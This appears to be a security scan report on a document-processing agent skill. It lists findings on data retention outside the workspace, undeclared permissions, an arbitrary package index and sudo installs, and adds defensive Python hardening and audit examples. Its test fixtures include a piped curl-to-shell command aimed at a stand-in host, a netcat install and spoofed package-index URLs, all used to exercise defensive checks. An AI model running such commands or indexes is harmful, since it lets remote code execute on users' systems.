Doc Processor

Security checks across malware telemetry and agentic risk

Overview

This document-processing skill is mostly local and purpose-aligned, but it can persist user documents/templates outside the active workspace while its security documentation understates that behavior.

Install only if you are comfortable with local document/template retention. Avoid using the generate/template-history features with confidential documents unless you manage or delete the user-templates directory yourself. Before running setup.sh, review which package index it will use (PIP_INDEX_URL or the first command-line argument), and run the privileged package-manager commands it lists only against trusted system repositories.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • Taint Tracking: Direct Taint Flow, Variable-Mediated Taint Flow, Credential Exfiltration Chain
  • MCP Least Privilege: Underdeclared Capability, Wildcard Permission, Missing Permission Declaration
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
Findings (9)

Tainted flow: 'saved_path' from pathlib.Path.read_bytes (line 1501, file read) → shutil.copy2 (file write)

Medium
Category
Data Flow
Content
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
template_id = f"tpl_{timestamp}_{file_hash}"
saved_path = self.user_template_dir / "templates" / f"{template_id}{template.suffix}"
shutil.copy2(template, saved_path)
content_type = self._infer_content_type_from_request(user_request)
template_info = TemplateInfo(path=str(saved_path), style=StyleDefinition(), content_type=content_type, usage_count=1, last_used=datetime.now().isoformat())
self._update_registry(template_info)
Confidence
84% confidence
Finding
shutil.copy2(template, saved_path)

Tainted flow: 'saved_path' from pathlib.Path.read_bytes (line 1501, file read) → shutil.copy2 (file write)

Medium
Category
Data Flow
Content
template = Path(output_path)
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
saved_path = self.user_template_dir / "templates" / f"{timestamp}_auto.docx"
shutil.copy2(template, saved_path)
content_type = self._infer_content_type_from_request(user_request)
template_info = TemplateInfo(path=str(saved_path), style=StyleDefinition(), content_type=content_type, usage_count=1, last_used=datetime.now().isoformat())
self._update_registry(template_info)
Confidence
87% confidence
Finding
shutil.copy2(template, saved_path)
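Both tainted-flow findings come down to the same pattern: a user document is copied, without the user opting in, to a template store rooted in a user-level directory rather than the active workspace. The following is an added example of the hardened form, written for this page and not taken from the scanned skill; `save_template`, the `.doc-processor` subdirectory and the `retain` flag are assumptions. It makes retention opt-in, keeps the store and its registry inside the workspace, and resolves both source and destination so a symlinked template cannot pull in a file from outside the workspace.

```python
"""Opt-in, workspace-contained template retention (added example; names
``save_template``, ``.doc-processor`` and ``retain`` are assumptions)."""
import hashlib
import json
import shutil
import tempfile
from datetime import datetime
from pathlib import Path


class RetentionDisabled(PermissionError):
    """Raised when retention was not explicitly enabled."""


class OutsideWorkspace(ValueError):
    """Raised when a source or destination resolves outside the workspace."""


def _inside(path: Path, root: Path) -> bool:
    """True if ``path`` (symlinks resolved) lies under ``root``."""
    try:
        path.resolve().relative_to(root.resolve())
        return True
    except ValueError:
        return False


def save_template(template: Path, workspace: Path, *, retain: bool = False) -> Path:
    """Copy ``template`` into the workspace-local store and record it.

    Retention is off by default: user documents are persisted only when the
    operator passes ``retain=True``.
    """
    if not retain:
        raise RetentionDisabled("template retention is opt-in and was not enabled")
    template, workspace = Path(template), Path(workspace)
    if not _inside(template, workspace):
        raise OutsideWorkspace(f"source {template} resolves outside {workspace}")

    store = workspace / ".doc-processor" / "templates"
    store.mkdir(parents=True, exist_ok=True)

    # Same naming scheme as the flagged code (timestamp + content hash), but
    # the destination is derived from the workspace, not a user-level dir.
    file_hash = hashlib.sha256(template.read_bytes()).hexdigest()[:12]
    timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
    saved_path = store / f"tpl_{timestamp}_{file_hash}{template.suffix}"
    if not _inside(saved_path, workspace):  # belt and braces
        raise OutsideWorkspace(f"destination {saved_path} resolves outside {workspace}")

    shutil.copy2(template, saved_path)

    # The registry lives next to the templates, so deleting the workspace
    # removes every trace of retained documents.
    registry = store / "registry.json"
    entries = json.loads(registry.read_text()) if registry.exists() else []
    entries.append({"path": str(saved_path.relative_to(workspace)),
                    "sha256_prefix": file_hash, "saved": timestamp})
    registry.write_text(json.dumps(entries, indent=2))
    return saved_path


def demo() -> dict:
    """Constructed scenario: a document inside the workspace, and a symlink
    inside the workspace pointing at a file outside it."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        workspace = root / "workspace"
        workspace.mkdir()
        doc = workspace / "contract.docx"
        doc.write_bytes(b"PK\x03\x04 constructed sample document")
        outside = root / "elsewhere.docx"
        outside.write_bytes(b"constructed file outside the workspace")
        link = workspace / "template.docx"
        link.symlink_to(outside)

        try:
            save_template(doc, workspace)
            results["default"] = "saved"
        except RetentionDisabled:
            results["default"] = "refused"

        saved = save_template(doc, workspace, retain=True)
        results["opt_in_inside_workspace"] = _inside(saved, workspace)

        try:
            save_template(link, workspace, retain=True)
            results["symlink_out"] = "saved"
        except OutsideWorkspace:
            results["symlink_out"] = "refused"

        registry = workspace / ".doc-processor" / "templates" / "registry.json"
        results["registry_entries"] = len(json.loads(registry.read_text()))
    return results


if __name__ == "__main__":
    print(demo())
```

The containment check runs on resolved paths on purpose: a plain string-prefix comparison on `user_template_dir` would accept a symlink that points elsewhere, which is exactly the cross-task leakage the findings describe.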

Lp3

Medium
Category
MCP Least Privilege
Confidence
87% confidence
Finding
The skill advertises installation steps and functionality that require shell execution, file read/write, environment-variable use, and network access for dependency installation, yet no permissions are declared. This creates a transparency and policy-enforcement gap: users and the platform cannot accurately assess or constrain what the skill may do before use.

Tp4

High
Category
MCP Tool Poisoning
Confidence
79% confidence
Finding
The skill claims to be focused on local document processing and emphasizes that AI/network features were removed, but the documented behavior still includes template registry management, historical-template matching, PDF generation, batch processing, and pip-based downloads from network sources. This mismatch can mislead reviewers and users about the actual attack surface, especially around persistent local data handling and external package retrieval.

Description-Behavior Mismatch

Medium
Confidence
80% confidence
Finding
The skill metadata says AI functionality was removed and the skill is focused on document processing, yet the code still performs request analysis, template matching, and persistent template management. In security-sensitive agent systems, this hidden functional expansion matters because it changes data retention and profiling behavior beyond what operators may expect or approve.

Context-Inappropriate Capability

Medium
Confidence
88% confidence
Finding
The processor creates and maintains a `user-templates` directory outside the workspace, establishing persistent storage for templates and registry data unrelated to a single document-processing operation. In an agent skill, writing outside the declared workspace weakens isolation boundaries and can lead to unexpected cross-task data leakage, retention, and policy violations.

Intent-Code Divergence

Medium
Confidence
88% confidence
Finding
The script claims packages come from official PyPI or trusted mirrors, but it accepts an arbitrary package index from PIP_INDEX_URL or the first command-line argument. This allows dependency installation from attacker-controlled repositories, enabling malicious package delivery or dependency confusion if a user runs the installer in a manipulated environment or with untrusted parameters.
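The check the installer is missing is a validation of the index before pip is ever invoked. The following is an added example (not the scanned skill's setup.sh) of that validation in the skill's own language: it reads the same two sources the finding names, PIP_INDEX_URL or the first command-line argument, but refuses anything that is not an https URL whose host is on an explicit allowlist, and it builds a pip command that pins a single index and requires hashes. The allowlist contents and the precedence chosen (argument first, then environment) are assumptions.

```python
"""Validate the package index before installing dependencies (added
example; allowlist contents and argument/env precedence are assumptions)."""
import sys
from urllib.parse import urlsplit

DEFAULT_INDEX = "https://pypi.org/simple"
# Assumption: extend with the hostname of your own vetted mirror.
TRUSTED_INDEX_HOSTS = frozenset({"pypi.org"})


class UntrustedIndex(ValueError):
    """The requested index failed validation."""


def resolve_index(argv: list, env: dict, trusted=TRUSTED_INDEX_HOSTS) -> str:
    """Return a validated index URL or raise UntrustedIndex."""
    # Same inputs as the flagged installer; only the validation is new.
    candidate = argv[1] if len(argv) > 1 else env.get("PIP_INDEX_URL", DEFAULT_INDEX)
    parts = urlsplit(candidate)
    if parts.scheme != "https":
        raise UntrustedIndex(f"index must be https, got {candidate!r}")
    if parts.username is not None or parts.password is not None:
        # 'https://pypi.org@evil.example/' has hostname evil.example, not pypi.org
        raise UntrustedIndex("userinfo in index URL is not allowed")
    host = (parts.hostname or "").lower()
    if host not in trusted:
        raise UntrustedIndex(f"index host {host!r} is not on the allowlist")
    return candidate


def pip_install_command(index: str, requirements: str = "requirements.txt") -> list:
    """Build the pip invocation: one --index-url and no --extra-index-url, so a
    second resolver cannot win a package name, plus --require-hashes, which
    makes pip refuse any requirement that is not pinned with a hash."""
    return [sys.executable, "-m", "pip", "install",
            "--index-url", index, "--require-hashes", "-r", requirements]


def demo() -> dict:
    """Constructed inputs: the default, a trusted mirror, and three rejects."""
    cases = {
        "default": (["setup.py"], {}),
        "env_trusted": (["setup.py"], {"PIP_INDEX_URL": "https://pypi.org/simple/"}),
        "arg_plain_http": (["setup.py", "http://pypi.org/simple"], {}),
        "env_untrusted_host": (["setup.py"], {"PIP_INDEX_URL": "https://evil.example/simple"}),
        "arg_userinfo_spoof": (["setup.py", "https://pypi.org@evil.example/simple"], {}),
    }
    out = {}
    for name, (argv, env) in cases.items():
        try:
            out[name] = resolve_index(argv, env)
        except UntrustedIndex:
            out[name] = "refused"
    return out


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

The userinfo case matters because a casual substring check for "pypi.org" passes it; parsing the URL and comparing the hostname does not.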

Missing User Warnings

Medium
Confidence
82% confidence
Finding
The README documents automatic saving and learning from user-provided templates without clearly warning that user documents may be persisted locally in the user-templates directory outside the active workspace. In a document-processing skill, templates can contain sensitive business, legal, financial, or personal data, so silent retention increases the risk of unintended disclosure, over-retention, and cross-user data exposure on shared systems.

Sudo/Root Execution

Medium
Category
Privilege Escalation
Content
        platforms: ["darwin"]
      - id: apt-poppler
        kind: system
        command: "sudo apt install -y poppler-utils"
        bins: ["pdftotext", "pdfinfo"]
        label: "Install poppler-utils (apt)"
        platforms: ["linux"]
Confidence
76% confidence
Finding
sudo
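A reviewer can apply the advice in the overview (run privileged package-manager commands only against trusted repositories) mechanically before executing any `kind: system` step. The following is an added example of such a pre-install audit; it is not part of the scanned skill. `STEPS` is a constructed stand-in for the skill's dependency list: the apt-poppler entry copies the finding above, the other entries are invented to exercise the checks, and the package-manager and package allowlists are assumptions about what this skill legitimately needs.

```python
"""Audit a skill's system-level install steps before running them (added
example; STEPS is constructed and the allowlists are assumptions)."""
import shlex

PACKAGE_MANAGERS = {"apt", "apt-get", "dnf", "brew", "pacman"}   # assumption
ALLOWED_PACKAGES = {"poppler-utils", "poppler"}                   # assumption
CONTROL_OPERATORS = {"|", "||", "&&", ";", "&"}
ASSUME_YES = {"-y", "--yes", "--assume-yes"}

# Constructed stand-in for the skill's dependency list. Only apt-poppler is
# taken from the finding; the rest are invented to exercise the checks.
STEPS = [
    {"id": "brew-poppler", "kind": "system", "command": "brew install poppler",
     "platforms": ["darwin"]},
    {"id": "apt-poppler", "kind": "system", "command": "sudo apt install -y poppler-utils",
     "platforms": ["linux"]},
    {"id": "pip-deps", "kind": "python", "command": "pip install -r requirements.txt"},
    {"id": "apt-extra", "kind": "system", "command": "sudo apt install -y poppler-utils netcat"},
    {"id": "bootstrap", "kind": "system",
     "command": "sudo apt install -y poppler-utils && curl https://example.invalid/x.sh | sh"},
]


def audit_step(step: dict) -> list:
    """Return the list of review issues for one install step (empty = clean)."""
    if step.get("kind") != "system":
        return []
    argv = shlex.split(step.get("command", ""))
    if not argv:
        return ["empty command"]
    # shlex.split keeps '&&' and '|' as plain tokens; anything chained or
    # piped is handed back for manual review rather than reasoned about.
    if any(tok in CONTROL_OPERATORS for tok in argv):
        return ["chained or piped command; review by hand"]
    issues = []
    if argv[0] == "sudo":
        issues.append("escalates to root via sudo")
        argv = argv[1:]
    if not argv or argv[0] not in PACKAGE_MANAGERS:
        issues.append("not an allowlisted package manager")
        return issues
    if any(tok in ASSUME_YES for tok in argv):
        issues.append("non-interactive install, no confirmation prompt")
    packages = [tok for tok in argv[1:] if not tok.startswith("-") and tok != "install"]
    unexpected = sorted(set(packages) - ALLOWED_PACKAGES)
    if unexpected:
        issues.append("unexpected packages: " + ", ".join(unexpected))
    return issues


def audit(steps=STEPS) -> dict:
    """Map each step id to its issues."""
    return {step["id"]: audit_step(step) for step in steps}


if __name__ == "__main__":
    for step_id, issues in audit().items():
        print(f"{step_id}: {issues or 'ok'}")
```

The sudo and `-y` flags are reported separately because they are separate decisions: a step can legitimately need root, but an unattended install that the user never confirms is what lets an unexpected package slip through.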

VirusTotal

66/66 vendors flagged this skill as clean.

View on VirusTotal